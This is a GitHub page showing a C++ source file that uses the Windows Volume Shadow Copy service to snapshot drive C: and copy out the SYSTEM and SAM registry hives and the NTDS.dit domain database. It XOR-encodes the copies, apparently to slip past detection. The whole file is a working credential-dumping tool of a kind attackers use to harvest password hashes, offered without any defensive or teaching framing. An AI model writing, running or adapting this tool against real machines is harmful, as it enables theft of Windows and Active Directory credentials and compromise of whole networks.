-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathmain.cpp
More file actions
153 lines (104 loc) · 4.78 KB
/
Copy pathmain.cpp
File metadata and controls
153 lines (104 loc) · 4.78 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
#pragma once
#include "main.h"
void CopyShadowFiles(std::wstring inputFilePath, std::wstring outputFilePath, char xorKey[])
{
//std::wstring inputFilePath = L"\\Windows\\system32\\config\\SYSTEM";
//std::wstring outputFilePath = L"C:\\SYSTEM.xor"; // Replace with your output path
// Open the input file using CreateFile
HANDLE hFile = CreateFile(inputFilePath.c_str(),
GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
if (hFile == INVALID_HANDLE_VALUE) {
std::wcerr << L"Error opening input file: " << inputFilePath << L" " << GetLastError() << std::endl;
return;
}
// Open the output file
HANDLE hOutFile = CreateFile(outputFilePath.c_str(),
GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr);
if (hOutFile == INVALID_HANDLE_VALUE) {
std::wcerr << L"Error opening output file: " << outputFilePath << L" " << GetLastError() << std::endl;
CloseHandle(hFile);
return;
}
// Read and XOR bytes
DWORD bytesRead, bytesWritten;
char buffer[4096]; // Buffer for reading and writing
while (ReadFile(hFile, buffer, sizeof(buffer), &bytesRead, nullptr) && bytesRead > 0) {
// XOR each byte with key
for (DWORD i = 0; i < bytesRead; ++i) {
buffer[i] ^= xorKey[i % sizeof(xorKey)];
}
// Write the XOR-ed data to the output file
WriteFile(hOutFile, buffer, bytesRead, &bytesWritten, nullptr);
}
// Close the files
CloseHandle(hFile);
CloseHandle(hOutFile);
std::wcout << L"File processed and saved to: " << outputFilePath << std::endl;
}
// https://github.com/albertony/vss/
int main(int argc, char** argv) {
std::wcout << L"Initializing COM context" << std::endl;
CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
CoInitializeSecurity(
NULL, // Allow *all* VSS writers to communicate back!
-1, // Default COM authentication service
NULL, // Default COM authorization service
NULL, // reserved parameter
RPC_C_AUTHN_LEVEL_PKT_PRIVACY, // Strongest COM authentication level
RPC_C_IMP_LEVEL_IMPERSONATE, // Minimal impersonation abilities
NULL, // Default COM authentication settings
EOAC_DYNAMIC_CLOAKING, // Cloaking
NULL // Reserved parameter
);
std::wcout << L"Creating VssBackupComponent object" << std::endl;
system("pause");
IVssBackupComponentsPtr m_pVssObject;
//SnapshotSetInfo m_latestSnapshotSet;
VSS_ID snapSetId;
CreateVssBackupComponents(&m_pVssObject);
m_pVssObject->InitializeForBackup();
m_pVssObject->SetContext(VSS_CTX_FILE_SHARE_BACKUP);
m_pVssObject->SetBackupState(true, true, VSS_BT_FULL, false);
m_pVssObject->StartSnapshotSet(&snapSetId);
//snapSetIdString = Guid2WString(snapSetId);
std::wcout << L"Adding volumes to shadow set" << std::endl;
// Add volumes to the shadow set
//for (size_t i = 0; i < volumeList.size(); ++i)
//{
//wstring volume = volumeList[i];
wstring volume = GetUniqueVolumeNameForPath(L"c:");
VSS_ID snapshotId;
m_pVssObject->AddToSnapshotSet((LPWSTR)volume.c_str(), GUID_NULL, &snapshotId);
wstring snapshotIdString = Guid2WString(snapshotId);
//m_latestSnapshotSet.snapshots.push_back(SnapshotInfo{ snapshotId, snapshotIdString });
//}
std::wcout << L"Snapshot ID" << snapshotIdString << std::endl;
std::wcout << L"Creating snapshot and wait a bit..." << std::endl;
system("pause");
IVssAsyncPtr pAsync;
m_pVssObject->DoSnapshotSet(&pAsync);
pAsync->Wait();
HRESULT hrReturned = S_OK;
pAsync->QueryStatus(&hrReturned, NULL);
/*for (size_t i = 0; i < m_latestSnapshotSet.snapshots.size(); ++i)
{*/
// Get shadow copy device (if the snapshot is there)
VSS_SNAPSHOT_PROP vssSnapProps;
m_pVssObject->GetSnapshotProperties(snapshotId, &vssSnapProps);
// Automatically call VssFreeSnapshotProperties on this structure at the end of scope
CAutoSnapPointer snapAutoCleanup(&vssSnapProps);
//m_latestSnapshotSet.snapshots[i].deviceName = vssSnapProps.m_pwszSnapshotDeviceObject;
std::wstring shadowDevice(vssSnapProps.m_pwszSnapshotDeviceObject);
std::wcout << shadowDevice << std::endl;
//}
std::wcout << L"Snapshot complete!" << std::endl;
std::wcout << L"Copying shadow files..." << std::endl;
system("pause");
// *
char key[] = { 0x00 };
CopyShadowFiles(shadowDevice + L"\\Windows\\system32\\config\\SYSTEM", L"C:\\SYSTEM.xor", key);
CopyShadowFiles(shadowDevice + L"\\Windows\\system32\\config\\SAM", L"C:\\SAM.xor", key);
CopyShadowFiles(shadowDevice + L"\\Windows\\NTDS\\NTDS.dit", L"C:\\NTDS.xor", key);
std::wcout << L"Done!" << std::endl;
return 0;
}